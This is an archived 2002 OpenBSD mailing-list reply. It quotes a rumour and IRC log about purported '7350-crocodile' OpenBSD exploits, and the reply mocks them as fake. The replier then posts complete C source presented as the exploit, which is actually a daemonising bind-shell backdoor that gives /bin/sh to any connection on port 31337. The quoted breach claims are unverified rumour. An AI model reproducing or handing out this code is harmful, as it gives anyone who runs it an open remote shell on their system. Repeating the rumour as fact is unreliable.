[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: OpenBSD rumours

To: <misc@openbsd.org>
Subject: Re: OpenBSD rumours
From: Adam Naguszewski <admin@bmtmc.gda.pl>
Date: Tue, 18 Jun 2002 11:17:00 +0200

On Mon, 17 Jun 2002 17:24:03 +0200, Alex de Joode wrote:
>Any comments ?
>
>http://online.securityfocus.com/archive/82/277224/2002-06-14/2002-06-

>20/0
>
><-- START -->
>
>Deer readers,
>
>Few days ago, while i was at the #darknet, i saw three ScRiPtKidIeZ
>(within the rest of them) talking about the 7350-crocodile.c,
>7350-obsdftpd.c and the 7350-pf.c exploit code by team
>teso made with support of GOBBLES Security, who gave them
>the advisories.
>
>The good news:
>
>the exploits aint that much spreaded and they've been kept on the
>underground for about 1month. This ain't really a good new, but it
>is better than the ones that follow.
>
>The bad news:
>
>- openbsd ftp/cvs have been compromised and backdoored by the
>kidies,
>that hang mostly on #!hack.the.turkey at efnet.
>- the technique is new and very obscure, the three exploits abuse em
>and is applicable only on *BSD flavors (afaik).
>
>
>
>the a really short part of the logs show this:
>
><m0rgan> ./a.out
><m0rgan> 7350-crocodile - x86/OpenBSD apache/telnetd/sshd
>*** pr0ix (pr0ix@def-con.org) has joined #darknet
><m0rgan> by lorian and scut / TESO
><m0rgan>
><m0rgan> ./7350-crocodile [options] [host] [port] [misc-option]
><m0rgan>
><m0rgan> -d <daemon> (1= apache, 2= telnetd, 3= sshd)
><m0rgan> -b bruteforce
><m0rgan> -c check only
><m0rgan> -s <0xaddr> start address
><m0rgan> -S shellcode (? to show the list)
><pr0ix> wtf?
><m0rgan>
><m0rgan> greetz: synnergy, GOBBLES Security, ElectronicSoulz,
>shiftee,
>bnuts, skyper.
><m0rgan> sidenote: nasa.gov was really easy ;>
><m0rgan> muahah fear.
><xxx> could you send me that?
>*** pr0ix sets mode: +b xxx!*@200.*
>*** xxx was kicked by pr0ix (0day-lurker)
>
>keep an eye open at your logs, as they said the exploit makes a
>lot of noise on the system and "private" logs and thus it is easy
>to spot, put your ids on.
>
><-- END -->
>
There you have it. Famous l33t hyper-turbo 7350-crocodile exploit. 
Have phun. LOL. Btw its faked
/*
 * Hey! krocodile exploit watever
 * just jave fun :) 
 */

#define PORT 31337 
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr; 
struct sockaddr_in client_addr;

int main () 
{ 
    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if (soc_des == -1) 
        exit(-1); 
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET; 
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, 
sizeof(serv_addr));
    if (soc_rc != 0) 
        exit(-1); 
    if (fork() != 0) 
        exit(0); 
    setpgrp();  
    signal(SIGHUP, SIG_IGN); 
    if (fork() != 0) 
        exit(0); 
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0) 
        exit(0); 
    while (1) { 
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, 
&soc_len);
        if (soc_cli < 0) 
            exit(0); 
        cli_pid = getpid(); 
        server_pid = fork(); 
        if (server_pid != 0) { 
            dup2(soc_cli,0); 
            dup2(soc_cli,1); 
            dup2(soc_cli,2);
            execl("/bin/sh","sh",(char *)0); 
            close(soc_cli); 
            exit(0); 
        } 
    close(soc_cli);
    }
}

-- 
Adam Naguszewski, admin@bmtmc.gda.pl on 06-18-2002

Follow-Ups:
- Re: OpenBSD rumours
  - From: Joel Rees <joel@alpsgiken.gr.jp>

References:
- OpenBSD rumours
  - From: Alex de Joode <usura@zedz.net>

Prev by Date: Re: pf on a p90
Next by Date: poweredge 1650
Prev by thread: OpenBSD rumours
Next by thread: Re: OpenBSD rumours
Index(es):
- Date
- Thread